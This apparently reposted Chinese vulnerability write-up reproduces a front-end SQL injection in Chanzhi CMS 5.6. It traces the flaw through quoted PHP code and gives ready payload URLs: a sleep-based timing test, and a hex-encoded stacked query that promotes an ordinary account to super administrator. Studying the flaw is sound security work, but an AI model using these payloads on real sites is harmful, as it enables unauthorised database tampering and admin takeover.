[复现]蝉知cms 5.6 前台注入+getshell
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[复现]蝉知cms 5.6 前台注入+getshell相关的知识,希望对你有一定的参考价值。
https://share.weiyun.com/5cbff06337d32a9748d0f1bead5ddbd5
前台注入
在/chanzhieps/system/module/cart/control.php页面的add函数
public function add($product, $count) { if($this->app->user->account == ‘guest‘) { /* Save info to cookie if user is guest. */ $this->cart->addInCookie($product, $count); $this->send(array(‘result‘ => ‘success‘, ‘message‘ => $this->lang->saveSuccess)); } else { $result = $this->cart->add($product, $count); if($result) $this->send(array(‘result‘ => ‘success‘, ‘message‘ => $this->lang->saveSuccess)); $this->send(array(‘result‘ => ‘fail‘, ‘message‘ => dao::getError())); } }
public function add($product, $count)
$count是用户输入
我们看会员登录以后的,也就是
$result = $this->cart->add($product, $count);
/chanzhieps/system/module/cart/model.php
public function add($productID, $count) { $hasProduct = $this->dao->select(‘count(id) as count‘)->from(TABLE_CART)->where(‘account‘)->eq($this->app->user->account)->andWhere(‘product‘)->eq($productID)->fetch(‘count‘); if(!$hasProduct) { $product = new stdclass(); $product->product = $productID; $product->account = $this->app->user->account; $product->count = $count; $this->dao->insert(TABLE_CART)->data($product)->exec(); } else { $this->dao->update(TABLE_CART)->set("count= count + {$count}")->where(‘account‘)->eq($this->app->user->account)->andWhere(‘product‘)->eq($productID)->exec(); } return !dao::isError(); }
如果能查到产品的话,更新数量set("count= count + {$count}")
继续跟进set函数
/chanzhieps/system/lib/base/dao/dao.class.php
public function set($set) { /* Add ` to avoid keywords of mysql. */ if(strpos($set, ‘=‘) ===false) { $set = str_replace(‘,‘, ‘‘, $set); $set = ‘`‘ . str_replace(‘`‘, ‘‘, $set) . ‘`‘; } $this->sql .= $this->isFirstSet ? " $set" : ", $set"; if($this->isFirstSet) $this->isFirstSet = false; return $this; }
可以看到直接进入了$this->sql
测试一下
http://localhost/www/index.php/cart-add-1-(select%20sleep(10))
成功进行延时操作
这个cms用的是pdo的方式连接mysql。也就是说可以多语句执行
http://localhost/www/index.php/cart-add-1-1;set%[email protected]=0x757064617465206570735f75736572207365742061646d696e3d27737570657227207768657265206163636f756e743d276675636b796f75273b;prepare%20x%20from%[email protected];execute%20x;select%201%20union%20select%201
update一下 将低权限账户提升至super
进入后台
以上是关于[复现]蝉知cms 5.6 前台注入+getshell的主要内容,如果未能解决你的问题,请参考以下文章
漏洞|74cms 3.6 前台SQL注入+Python脚本小练习